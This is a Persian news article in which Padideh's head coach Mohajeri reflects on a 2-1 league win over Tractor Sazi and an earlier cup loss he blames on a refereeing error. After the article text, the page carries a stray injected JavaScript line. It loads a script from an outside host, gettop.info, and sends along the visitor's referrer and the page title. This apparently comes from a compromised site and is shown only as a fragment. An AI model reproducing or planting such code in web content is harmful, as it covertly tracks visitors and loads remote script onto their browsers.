مهاجری: اشتباهات جام حذفی را جبران کردیم


رضا مهاجری

سرمربی تیم فوتبال پدیده با ابراز خرسندی از برد تیمش برابر تراکتورسازی گفت: اشتباهات بازی جام حذفی را جبران کردیم.

به گزارش سادس، محمدرضا مهاجری بعد از پیروزی 2 بر یک تیمش مقابل تراکتورسازی و صعود به رتبه دوم جدول رده بندی گفت: به بازیکنانم تبریک می‌گویم که بارها روی دروازه حریف موقعیت کسب کردند. خوشحالم که اشتباهات بازی جام حذفی را جبران کردیم و تیم تراکتورسازی به جز یکی دو صحنه، موقعیت دیگری نداشت. این برد را متعلق به مجموعه پدیده می‌دانم و امیدوارم با تلاش بیشتر بازی‌های آینده را هم با برد پشت سر بگذاریم.

او ادامه داد: در شروع بازی یک بازیکن را از دست دادیم و به تیم شوک وارد شد. تراکتورسازی هم نیاز به زمان دارد. برد امروز سخت به دست آمد و این باخت چیزی از ارزش‌های تراکتورسازی کم نمی‌کند.

مهاجری افزود: تراکتورسازی در جام حذفی ما را برد اما اشتباه داوری در گل‌ آن‌ها در آن بازی کاملا مشهود بود. داور اشتباه می‌کند اما این فوتبال است که ادامه‌دار است. به خاطر آن اشتباه ما 50 درصد راه را از دست دادیم و کنار رفتیم ولی تماشاگرانمان هیچ اعتراض نکردند. فوتبال دو روی برد و باخت دارد و باید با تلاش بیشتر به فکر آینده باشیم.

سرمربی پدیده همچنین خاطرنشان کرد: تعویض‌های‌مان امروز خوب بودند و بازیکنان جوان تیم در جو ورزشگاه عملکرد خوبی داشتند. در نیمه اول انتظارمان از بازیکنان برآورده نشد. در نیمه دوم تغییراتی را بدون انجام تعویض داشتیم. روی بازی مسلط شدیم و موقعیت خوب گلزنی ایجاد کردیم.

ادامه دارد …

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *